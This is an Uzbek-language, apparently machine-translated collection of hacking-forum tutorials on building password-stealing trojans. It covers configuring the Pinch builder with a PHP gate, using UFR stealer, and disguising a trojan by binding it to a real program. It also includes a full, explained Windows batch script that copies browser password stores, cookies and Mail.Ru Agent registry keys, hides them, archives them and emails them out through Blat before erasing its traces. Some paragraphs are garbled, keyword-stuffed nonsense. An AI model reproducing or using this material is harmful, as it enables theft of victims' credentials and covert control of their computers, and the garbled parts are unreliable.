Odamlar!!!
Endi men sizga o'z troyan virusingizni (deyarli o'zingizniki) qanday yaratishni aytaman!Sizga nima kerak:
miyalar - 1 dona, kompyuter - 1 dona, Internetga kirish - 1 dona, Pinch (quruvchi) - 1 dona, server (troyan hisobotlari uchun) - 1 dona, Parser (hisobotlarni shifrlash uchun).Balki hammasi shu...
Endi, har doimgidek, qisqacha hikoya.
Troyanlar
..ular taxminan 33 asr oldin ma'lum bo'lganMiloddan avvalgi 12-asrda. Gretsiya Troya shahriga urush e'lon qildi.
Mojaro troyan shahzodasi Sparta qirolichasi Xelenni o'g'irlab, uni xotiniga aylantirmoqchi ekanligini e'lon qilganida paydo bo'ldi. Bu tabiiy ravishda yunonlarni, ayniqsa Sparta qirolini g'azablantirdi. Yunonlar Troyani 10 yil qamal qilishdi, ammo hech qanday natija bermadi, chunki... Troya yaxshi mustahkamlangan edi.
Oxirgi urinishda yunon qo'shini orqaga chekinayotgandek ko'rindi va ulkan yog'och otni qoldirdi. Troyanlar otni ko‘rib, bu yunonlar sovg‘asi deb o‘ylab, bo‘sh yog‘och otning ichida eng yaxshi yunon askarlari o‘tirganini sezmay, otni shaharga sudrab kirib ketishdi.
Zulmat qoplami ostida askarlar tashqariga chiqib, shahar darvozalarini ochishdi va keyin qolgan qo'shin bilan birga butun Troya qo'shinini o'ldirishdi. Yog'och ot kabi, dastur
Troyan oti o'zini bir ishni qilayotgandek ko'rsatadi, lekin aslida butunlay boshqacha ishni qiladi.Aleksey Demchenko - rossiyalik Kul Xatsker "aka coban2k" nomi bilan ham tanilgan.
Ko'pgina dasturlarning muallifi va uning eng yaxshi (mening fikrimcha) dasturi bu PINCH, Internetdagi eng keng tarqalgan troyan! Ko'pgina dasturlash tillarini biladi, xususan: C++, Paskal, Delphi, MySQL, PHP, XML va boshqalar. Umuman olganda, men uning shaxsiy veb-saytiga kirishingizni maslahat beraman www.cobans.net, u erda siz u haqida ba'zi ma'lumotlarni topasiz.Xususan, biz Pinch dasturini ko'rib chiqmoqdamiz (Pinch 2.58)
Pinch 2.58 bu quruvchi, troyan virusi kompilyatori... chunki... quruvchida siz troyanning ma'lum funksiyalariga hujum qilasiz... masalan: ICQ, TheBat, FAT, brauzer cookie-fayllaridan parollarni o'g'irlash (bu eng mashhuri).
LEKIN bu hammasi emas Pinch ham qila oladi: reestrda ma'lum bir parametrni yaratish/tahrirlash, ish tugagandan so'ng o'zini o'chirish, "O'limning ko'k ekrani" ni yaratish yoki undan ham yaxshisi, jabrlanuvchining kompyuterida server (konsol) yaratish (BackDoor) ), shundan so'ng jabrlanuvchining kompyuteri sizning mulkingizdir (so'zma-so'z). Siz uning IP manzili orqali uning kompyuteri orqali DDOS hujumlarini amalga oshirishingiz mumkin va hozirda anonim suverenitetingizni saqlab qolishingiz mumkin.
Sizning ixtiyoringizda faqat bitta kompyuter bo'lishi mumkin deb o'ylamang. Ulardan xohlagancha ko'p bo'lishi mumkin, lekin bu allaqachon BotNet deb ataladi...Xo'sh, hammasi shu, boshlaylik ...
Quyida Pinch Builder qanday ko'rinishini ko'ring:
1.1-rasm
55 soniyadan keyin qo'shiladi
Endi men troyan qanday ishlashini tushuntiraman ...1. Hisobotlar siz ko'rsatgan elektron pochtaga yuborilishi uchun troyanni kompilyatsiya qilishingiz mumkin. Ammo ular sizni (ya'ni troyaningizni) yoqishi mumkin, chunki... sizning jabrlanuvchingizda SP2 (Windows XP Service Pack 2) bo'lishi mumkin), ya'ni FireWall ham bor... Firewall hech qachon yoqilmaydi (sizning ruxsatingizsiz) port 25 (SMTP), ya'ni Troya qurbonning hisobotini yubora olmaydi. E-mail. (Mail.ru, yandex.ru va boshqalar kabi taniqli pochta jo'natuvchilari hisobotlarni qabul qilmaydi) http://goolook.ru pochtasidan foydalaning Lekin shunga qaramay, men SMTP dan foydalanishni tavsiya etmayman!
2. Hisobotlar siz ko'rsatgan serverga yuborilishi uchun troyanni kompilyatsiya qilishingiz mumkin.
Bu xavfsizroq, chunki Hisobotni yuborish vaqtida Pinch o'zini quyidagicha namoyon qiladi:
Jarayon nomi: iexplorer.exe
Protokol: http
Masofaviy manzil: www.YOUR_SERVER.xxx/get.php
FireWall "iexplorer.exe" jarayonini to'xtata olmaydi (va agar imkon bo'lsa, kompyuter monitorida hech narsani ko'rmaysiz (ish stoli rasmidan tashqari))
Protokol: http:// port “80” degan ma'noni anglatadi (ISHORLAR YO'Q)Shunday qilib, bugun biz "2-chi" ni ko'rib chiqamiz, men bu yaxshiroq deb aytdim (?).
Keling, Builder >>> da boshqa poygalarni ko'rib chiqaylik
1.1-rasm
1. "HTTP" yorlig'ini bosing va "HTTP" protokolini tanlang.
2. URL maydoniga veb-saytingiz (server) manzilini kiriting, masalan: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
Biz bunga batafsil to'xtalamiz...
Pinch sizga http:// orqali hisobot yuborishi uchun sizga server kerak (buni oddiygina “sayt” deb ataymiz) va shuning uchun sizga PHP SCRIPTLARI MAJBURIY ISHLASHI KERAK sayt kerak!!! Ulardan eng yaxshisi http://jino-net.ru
To'g'ri, men http://onepage.ru/ ham borligini aytdim, lekin server yo'q qilindi.
Davom etaylik...
Shunday qilib, http://jino-net.ru saytida istalgan domen va istalgan parol ostida ro'yxatdan o'ting J).
Roʻyxatdan oʻtganmisiz?
Menimcha ha…
Davom etaylik...
Aytaylik, siz http://petia_lox.jino-net.ru domeni ostida ro'yxatdan o'tgansiz
Biz saytingizning FTP-ga o'tamiz. FTP nima ekanligini bilasizmi? Ehhhh... Sizga aytishim kerak, chunki men o'zimni eslayman ...
FTP - bu saytingizning mazmuni... ya'ni FTP protokoli (21-port) yordamida siz turli kataloglar/papkalar/fayllar va hokazolar joylashgan saytingizning ildiziga kirasiz.Keling, Google.ru saytiga boramiz va "CuteFTP" dasturini yuklab olamiz ... Ehtimol, men buni siz uchun qilaman.
Bu yerga boramiz >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
Menga 4-chi havola ko'proq yoqadi.
CuteFTP 7.1 + Russifierni yuklab oling
Keling, >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
O'ylaymanki, keyin siz dasturni qanday yuklab olishni va uni qanday o'rnatishni aniqlaysiz.1 daqiqadan so'ng qo'shiladi
Yuklandi, o'rnatildi, ruslashtirildi... davom etaylik...Endi saytingizning FTP-ga o'ting. /docs/ jildiga o'ting, ushbu papkada istalgan papka yarating, masalan, "mail_p", ushbu jildga CHMOD 777 huquqlarini bering (kontekst menyusidagi papkani o'ng tugmasini bosing, "CHMOD" yoki "Xususiyatlar" parametrini toping CuteFTP dasturining turli versiyalarida, turli tarjimalarda)
Endi kirishni ushbu jildga yuklang (mail_p). olish nima?
Pinchdan hisobotlarni qabul qilish uchun ushbu darvoza skriptini “oling” “.php” kengaytmasiga ega.
Bu yerdan olishingiz mumkin >>>
http://pinch3.ru/other/gate.txt
Kompyuteringizda Notepad matn faylini yarating va darvoza matnidan nusxa oling
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> fayl.php matniga kengaytma bering (ilgari u .txt edi)Skript tayyor, uni "pochta" deb o'zgartiring va uni /docs/mail_p/ papkasida veb-saytingizning FTP-ga yuklang.
Va ushbu faylga CHMOD huquqlarini bering 777.Bu joyni eslab qoling, endi hisobotlar get joylashgan ushbu jildga yuboriladi (/docs/mail_p/).
Shunday qilib, biz URL maydoniga yozamiz (agar siz hali unutmagan bo'lsangiz, quruvchida)
http://petia_lox.jino-net.ru/mail_p/mail.php (sizning shaxsiy manzilingiz bor)3. Keling, ko'rib chiqaylik >>>
1.2-rasm
1.2-rasmdagi kabi barcha katakchalarni belgilang
"Opera" parametri ustidagi katakchani belgilamang, aks holda hisobot shifrlanmaydi (quyida o'qing).Siz allaqachon kompilyatsiya qilishingiz mumkin ... lekin biz boshqa qo'shimcha funktsiyalarni ham ko'rib chiqamiz (garchi ular ba'zan hatto majburiy bo'lsa ham) ...
"PWD" yorlig'i biz nima ekanligini allaqachon bilamiz)
"Ishga tushirish" yorlig'i ummmm uchun, aytaylik, Pinch-ning aql-idrokini yaxshilash, ya'ni o'zini o'chirish, Windows-da .dll-larni saqlash va boshqalar uchun.
Ayg'oqchi yorlig'i. IE KeyLog va hokazolarni saqlash uchun jabrlanuvchi monitorining skrinshotini yuboring.
PHP konsoli buyruqlari uchun "NET" yorlig'i xabar beradi/ Qolganini bilmayman...
Mening sevimli BegDor hech qachon Pinch'a-dan "BD" yorlig'idan foydalanmagan ...
Troyanni siqish, troyan belgisini o'zgartirish uchun "va hokazo" yorlig'i.
Har qanday jarayonlarni o'ldirish uchun "O'ldirish" yorlig'i (masalan, FireWall)
"IE" yorlig'i: IEni boshqaring, saytni sevimlilarga qo'shing, havolaga o'ting.
Men "qurt" yorlig'ini bilmayman ... DNSsec bilan bog'liq narsa.
"IRC-bot" yorlig'i asosan bottrek uchun mo'ljallangan. BOTNET qoidalari)!!!PWD yorlig'iga qayting va (pastki) "KOMPILE" tugmasini bosing
HOOR!!! TROYAN TAYYOR!!!
Hacking Troyan virusini qanday yaratish mumkin. Chimchilash (lamerlar uchun)
Mojaro troyan shahzodasi Sparta qirolichasi Xelenni o'g'irlab, uni xotiniga aylantirmoqchi ekanligini e'lon qilganida paydo bo'ldi. Bu tabiiy ravishda yunonlarni, ayniqsa Sparta qirolini g'azablantirdi. Yunonlar Troyani 10 yil qamal qilishdi, ammo hech qanday natija bermadi, chunki... Troya yaxshi mustahkamlangan edi.
Oxirgi urinishda yunon qo'shini orqaga chekinayotgandek ko'rindi va ulkan yog'och otni qoldirdi. Troyanlar otni ko‘rib, bu yunonlar sovg‘asi deb o‘ylab, bo‘sh yog‘och otning ichida eng yaxshi yunon askarlari o‘tirganini sezmay, otni shaharga sudrab kirib ketishdi.
Zulmat qoplami ostida askarlar tashqariga chiqib, shahar darvozalarini ochishdi va keyin qolgan qo'shin bilan birga butun Troya qo'shinini o'ldirishdi.
Yosh adminning eslatmalari
Bir necha kun oldin, do'stlarimdan biri mening aloqa devorimga graffiti qoldirib, u mening hisobimni buzganligi va hokazo. vk-****.msk.ru saytiga havola bor edi. Xo'sh, ha. Albatta.) Men darhol uni davolash va parolini o'zgartirish uchun unga yozdim. Ammo bu havola meni qiziqtirdi, garchi men bu troyan ekanligini aniq bilsam ham (bu meni qiziqtirdi). Men ushbu havolani kuzatishga qaror qildim. Natijada, menga yaqinda aniqlangan kontakt zaifligidan foydalanadigan va istalgan hisobni buzishga imkon beruvchi dasturni yuklab olishni taklif qilishdi.
Parollarni o'g'irlash uchun troyan yaratish bo'yicha ko'rsatmalar
Internet-bankingdan pul o'g'irlash bo'yicha qisqacha qo'llanma Hacking Territory: HackZona 2010 yil 28 dekabr Veb-saytlar, bloglar, forumlar, onlayn-do'konlar yaratish, ularni targ'ib qilish haqida. Buning uchun qandaydir troyandan foydalanish kerakmi, bilmayman. . mening uy parollarim juda murakkab, shuning uchun ularni buzish mumkin deb umid qilaman. asli Ukrainadan (ro'yxatdan o'tish, sharhlar va Likpay imkoniyatlari) Parollarni o'g'irlash uchun troyan yaratish! — YouTube, 2012-yil 1-noyabr, agar tushunmasangiz, Skype-ga yozing: comrad714 dasturining nomi UFR stealer 3.0.1.0.
Troyanni qanday yaratish kerak
Tayyor bo'ling, biz bir vaqtning o'zida ikkita dastur yozishimiz kerak. Biri sizning mashinangizda (mijoz) bo'ladi, ikkinchisi qurbonga (serverga) tashlanishi kerak. Ko'p ish bo'ladi, shuning uchun kamroq so'zlar va tanaga yaqinroq bo'ladi.
Shunday qilib, Delphi-ni ishga tushiring yoki agar u allaqachon ishlayotgan bo'lsa, yangi loyiha yarating ("Fayl" - "Yangi dastur"). Endi biz troyanning server qismiga tushamiz.
Bu erda siz "1-dan" ni "Avtomatik shakllar yaratish" bo'limidan (chapdagi ro'yxat) "Mavjud shakllar" ga (o'ngdagi ro'yxat) ko'chirishingiz kerak, xuddi men qilgan.
Troyanni qanday yaratish kerak
O'ylaymanki, har bir o'quvchi "Troya oti" iborasining kelib chiqishi va ma'nosini biladi. Troyan virusining ishlash printsipi taxminan bir xil (shuning uchun u o'z nomini oldi). Ushbu virusning ko'p turlari mavjud, bugun men Aleksey Demchenkoning ishlanmalariga asoslangan troyan dasturini yaratish variantlaridan biriga to'xtalib o'taman yoki u juda ko'p sonlarning muallifi bo'lgan "aka coban2k" dasturlari, jumladan PINCH, bu butunjahon Internetdagi eng keng tarqalgan troyanga aylandi!
Troyan dasturini qanday yaratish kerak.
Biz troyan yaratdik va endi parollarni o'g'irlash uchun troyan yaratamiz!
Bu erda men sizga ICQ, Vkontakte, Odnoklassniki, Mail-dan parollarni o'g'irlash uchun oddiy troyanni qanday qilishni aytaman. va boshqalar. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%
Endi bloknot yordamida "1.bat" faylini oching. va "Login" so'zlarini Yandex pochtasidan loginingizga o'zgartiring. va "Parol" so'zini Yandex pochta paroliga o'zgartiring.
kutamiz. yuklab olish tugallandi.
Biz brauzerlardan barcha parollarni o'g'irlaydigan troyan yaratamiz (va'da qilinganidek)
Shunday qilib, avval biz UFR stealer dasturini yuklab olishimiz kerak, buni vazonez.com rasmiy veb-saytida yoki havola orqali amalga oshirish mumkin >> http://rghost.ru/55883641
Keyin biz "qurilish variantlari" ga o'tamiz va troyanimiz haqiqiy dasturga o'xshab ko'rinishi uchun o'zgartirish belgisini bosing yoki fayllarni birlashtirish tugmasini bosing (jabrlanuvchi troyan yopishtirilgan dasturni ishga tushirgan ma'qul va dastur bilan birga Troyanning o'zi)
Parollarni o'g'irlash uchun troyan yaratish
Virusning ishlash rejasi quyidagicha: u ishga tushiriladi, u shaxsiy kompyuterdagi barcha papkalarni skanerlaydi va kerakli fayllarni (maska bilan, masalan, *.txt. pass* va hokazo) flesh-diskga ko'chiradi.
Kengaytirilgan buyruqlarni qayta ishlash rejimini yoqadi, ya'ni bir holatda ikkita buyruq va boshqalar kabi murakkab konstruktsiyalarga ruxsat beradi. Kulmang, chunki Batch uchun bu juda zo'r.
Keyinchalik, ommaviy ish fayli ishga tushirilgan katalogga yo'lni eslab qolishingiz kerak (biz ma'lumotlarni ba'zi qattiq diskka emas, balki flesh-diskimizga nusxalashimiz kerak), chunki keyingi keladigan kod CD o'zgaruvchisining qiymatini chalkashtirib yuboradi ( joriy ishchi papka).
Troyan ishining oxirida, u tayyor.txt faylini yaratadi, shunda biz uning ishlaganligini bilib olamiz (biz troyanni konsolsiz, ko'rinmas holga keltiramiz).
VKontakte parolini o'g'irlash uchun troyan, o'rnatuvchini yuklab oling
Bitta ustunda, Kontaktda parolni o'g'irlash uchun troyan PS3-da o'yinni bloklaydi. Parolni o'g'irlash uchun troyan tan olingan materialni o'g'irlash uchun egasining geografik koordinatalarini hisobga oladi. Foydalanuvchi harakatlarini hisobga olgan holda, troyan paroli tizimdagi aloqa uchun displeyni shaxsiylashtirishga imkon beradi.
Muloqot uchun parol troyanlari va avtomatik muzokaralar eng zamonaviy yaratish vositalarini taqdim etadi.
Parol o'g'irlash uchun troyan
Xuddi ofis ishi kabi, u virtual disk shaklida oson navigatsiyani ta'minlaydi. Active Control xatcho'plar bilan ishlash uchun mahsulot chiqarilishini e'lon qiladi. Chiziqli makon sotib olishni oldini olish uchun ularning aniq joylashishini belgilaydi.
Power Batch trafikni cheklash uchun yordam mavzusini qidirmoqda. Nonvoyxonadagi juda katta hajm sizga hisobotlarni ko'rsatishga imkon beradi. Sovutish uchun tugmachalarni bosib ushlab turish orqali troyan parolini o'g'irlash, masalan, individual tahrirlash, ma'lumotlarni to'liq uzatishni o'z ichiga oladi.
Troyan №9
Antivirus Stealer - ushbu dasturni oching, 2 ta fayl va papkani flesh-diskga (Antivirus.bat,autorun.inf,prog) nusxalang va siz do'stlaringiz bilan flesh-disk bilan borishingiz mumkin! Siz flesh-diskni kompyuterga joylashtirasiz, Antivirus.bat-ni bosing, u to'xtaganida siz uni yopishingiz va flesh-diskni chiqarib olishingiz mumkin, kompyuteringizda flesh-diskdagi barcha parollar, ular "prog" da saqlanadi. ” -> “log” jildiga.
Ushbu maqolada men parollar bilan fayllarni o'g'irlaydigan va barchasini pochta qutingizga yuboradigan virusni qanchalik tez va qiyinchiliksiz yozishingiz va yaratishingiz mumkinligini tasvirlab beraman.
Virus bat"e (CMD, siz asosiy buyruqlarni olishingiz mumkin), ya'ni oddiy matn faylida yozilishi va standart o'rnatilgan Windows tarjimoni - "buyruqlar satri" yordamida amalga oshirilishidan boshlaylik. ".
Bunday virusni yozish uchun siz u o'g'irlaydigan fayllarni aniq saqlash joyini, http://www.blat.net/ saytidan yoki serverimizdan yuklab olinadigan Blat komponentlarini bilishingiz kerak, shuningdek, WinRaR arxivatorining Rar.exe komponenti (siz usiz ham qilishingiz mumkin).
Bloknotni oching va u erda quyidagi kodni nusxalang:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md%SystempD\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" nusxa ko'chirish /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" nusxasi /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ nusxa /y wand.dat %SystemDrive%\pass\opera\wand.dat nusxasi /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\RuMail\. magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite nusxasi /y key3.db %SystemDrive%\pass\Mozilla\key3.db nusxasi /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite nusxasi /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Parol ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -ilklang %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Men yuklashning o'zi kodi haqida ko'p yozmayman.
@echo off - batinkaning tanasini yashiradi (shuning uchun kerak emas, lekin baribir)
md %systemroot%\wincs - qaysi diskda o'rnatilganligi yoki qanday nomlanishidan qat'i nazar, Windows tizim papkasida wincs papkasini yaratadi.
md %SystemDrive%\pass\ - Windows tizimi o'rnatilgan diskda o'tish papkasini yaratadi.
md %SystemDrive%\pass\opera\ - kelajakda Opera brauzeridan wand.dat va cookies4.dat nusxalanadigan opera papkasini yaratadi (11* versiyagacha, Opera o'z parollarini wand.dat faylida saqlaydi)
md %SystemDrive%\pass\Mozilla\- kelajakda parollar saqlanadigan Mozilla brauzeridagi fayllar (cookies.sqlite, key3.db, signons.sqlite) nusxalanadigan Mozilla papkasini yaratadi.
md %SystemDrive%\pass\MailAgent\- pochta agentidan yozishmalar tarixi va ro'yxatga olish kitobi kalitlari (parollarni saqlaydigan) o'z ichiga olgan fayllar nusxalanadigan MailAgent papkasini yaratadi.
md %SystemDrive%\pass\MailAgent\reg- reg papkasini yaratadi
attrib %systemroot%\wincs +h +s +r- atributlarni wincs papkasiga qo'yadi va shu bilan uni ko'zdan yashiradi.
attrib %SystemDrive%\pass +h +s +r- yuqoridagi kabi.
nusxa ko'chirish /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- blat.exe faylini yuklash joyidan wincs jildiga ko'chiradi
nusxa ko'chirish /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- blat.dll faylini yuklash joyidan wincs jildiga ko'chiradi
nusxa ko'chirish /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- blat.lib faylini yuklash joyidan wincs jildiga ko'chiradi
CD /D %APPDATA%\Opera\Opera\ - opera uchun parollar (va boshqa narsalar) bo'lgan fayllar joylashgan opera papkasiga o'tadi.
nusxa /y wand.dat %SystemDrive%\pass\opera\wand.dat- wand.dat faylini opera papkasiga ko'chiradi
nusxa /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- cookie4.dat faylini opera papkasiga ko'chiradi
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- parol saqlanadigan magent_logins2 ro'yxatga olish kitobi kalitini reg papkasiga eksport qiladi
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- parol saqlanadigan magent_logins3 ro'yxatga olish kitobi kalitini reg papkasiga eksport qiladi
CD /D %APPDATA% - AppData jildiga o'ting
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- Mra\Base jildining mazmunini MailAgent jildiga ko'chiradi
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- ver.txt faylini MailAgent jildiga ko'chiradi
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- Mozilla brauzer profili bilan jildga o'ting
nusxa /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- cookies.sqlite faylini Mozilla papkasiga ko'chiradi
nusxa /y key3.db %SystemDrive%\pass\Mozilla\key3.db- key3.db faylini Mozilla papkasiga ko'chiradi
nusxa /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- signons.sqlite faylini Mozilla papkasiga ko'chiradi
nusxa ko'chirish /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- WinRar Rar.exe arxivlovchi komponentini pass papkasiga ko'chiradi
del /s /q %SystemRoot%\Rar.exe- Windows papkasidan arxivlovchi komponentni olib tashlaydi
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- pass papkasining mazmunini arxivlash
nusxa /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar yaratilgan arxivni wincs jildiga nusxalash
cd %systemroot%\wincs - wincs jildiga o'ting
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Parol - avtorizatsiya uchun ma'lumotlarni ko'rsatish va xatni yuborish orqali arxivni yuborish uchun Blat dasturini tayyorlaydi yuborilgan.
ren *.rar pass.rar - agar jarayon davomida arxiv noto'g'ri nom olmagan bo'lsa, biz uning nomini pass.rar deb o'zgartiramiz.
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -% systemroot%\wincs\pass.rar-ni biriktiring- xat qaysi pochta manziliga yuborilishini ko'rsating va yuboring.
rmdir /s /q %SystemDrive%\pass- o'tish papkasini o'chirish
rmdir /s /q %systemroot%\wincs- wincs jildini o'chirib tashlang
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- Windows papkasidan Blat komponentlarini olib tashlang.
del /s /q %systemroot%\blat.lib- Windows papkasidan Blat komponentlarini olib tashlang.
attrib +a +s +h +r %systemroot%\wind.exe- biz o'zimizga atributlarni qo'yamiz va shu bilan o'zimizni ko'zdan yashiramiz.
EXIT - biz batinka jarayonini yakunlaymiz va chiqamiz.
cls - tarjimondagi har qanday satrlarning chiqishini tozalang.
Nusxa olindi, wind.bat sifatida saqlangan va Bat to exe konvertor dasturi yordamida exe-ga kompilyatsiya qilingan, keyin biz hamma narsani birlashtiramiz, ya'ni Blat dasturining komponentlarini va WinRar arxivlovchi komponentini (siz yuklab olishingiz mumkin) olib, ularni yopishtiramiz. bitta bajariladigan fayl yoki qaysi biri bilan biron bir dastur bo'lsa, barcha fayllarni yuklash yo'li %SystemRoot% yoki %WindowsDir% yoki %windir% bo'lishi kerak.
Natijada, biz antiviruslar tomonidan olinmaydigan va fayllar bilan arxivni elektron pochtangizga yuboradigan virusga ega bo'lamiz. operadan faqat wand.dat va keyin u 11*versiyalarga yangilanmagan bo'lsa, boshqa barcha fayllarni o'zingizniki bilan almashtirish orqali parolini ochish mumkin.
O'ylaymanki, biz bu erda tugatamiz, lekin agar sizda biron bir savol bo'lsa, so'rashdan tortinmang.
E'tiboringiz uchun rahmat, barchangizga yaxshilik!
©TheHackWorld.in bilan almashtiring
Bu erda men sizga ICQ, Vkontakte, Odnoklassniki, Mail... va hokazolardan parollarni o'g'irlash uchun oddiy troyanni qanday qilishni aytaman.
Keling, boshlaylik... birinchi navbatda bizga ba'zi dasturlar kerak:
Multi Password Recovery - unutilgan parollarni tiklash uchun yordamchi dastur
blat elektron pochta mijozidir.
Bat to Exe konvertori - bat-exe formatini o'zgartiruvchi.
Bularning barchasini bitta arxivda yuklab olishingiz mumkin:
Havolani ko'rish uchun ro'yxatdan o'tishingiz kerak.
Yuklab oling va alohida jildga oching...
Endi “1.bat” faylini bloknot bilan oching... va “Login” so‘zlarini Yandex pochtasidan loginingizga o‘zgartiring... va “Parol” so‘zini Yandex pochtasidan parolingizga o‘zgartiring...
Saqlash va yopish...
Endi "Bat_To_Exe_Converter" ni oching...
"Ommaviy ish fayli" maydonida siz saqlagan faylni ko'rsating "1.bat"
"Boshqacha saqlash" maydonini o'zgartirib bo'lmaydi...
Sozlamalarni quyida ko'rsatilgandek o'rnating:
Endi "Qo'shish" yorlig'iga o'tamiz...
Va u erda "blat" va "MPR ..." papkalaridagi barcha fayllarni o'tkazing.
Ulardan yettita bo'lishi kerak yuqorida ko'rsatilgandek!!!
Xo'sh, endi troyanimizga belgi qo'shamiz ... bu kerak emas, lekin u qandaydir dasturga o'xshaydi...
"Versiya ma'lumotlari" yorlig'iga o'ting va "Icon fie" maydonida belgini tanlang....
"Tuzish" tugmasini bosing...
Yuklab olish tugashini kutamiz... va “1.bat” fayli boʻlgan papkani tekshiring... u yerda sizning “1.exe” troyaningiz paydo boʻlishi kerak edi (Siz uni xohlaganingizcha chaqirishingiz mumkin)
)...
Xo'sh, endi tekshiramiz ... kompyuterimizda troyanni ishga tushiring va kuting ... 30 soniyadan keyin ... elektron pochtangizga fayl yuboriladi ... uni yuklab oling (parollar unda saqlanadi)
Yuklab olingan... endi biz uni "MPR" orqali ishga tushiramiz va parollarga qoyil qolamiz
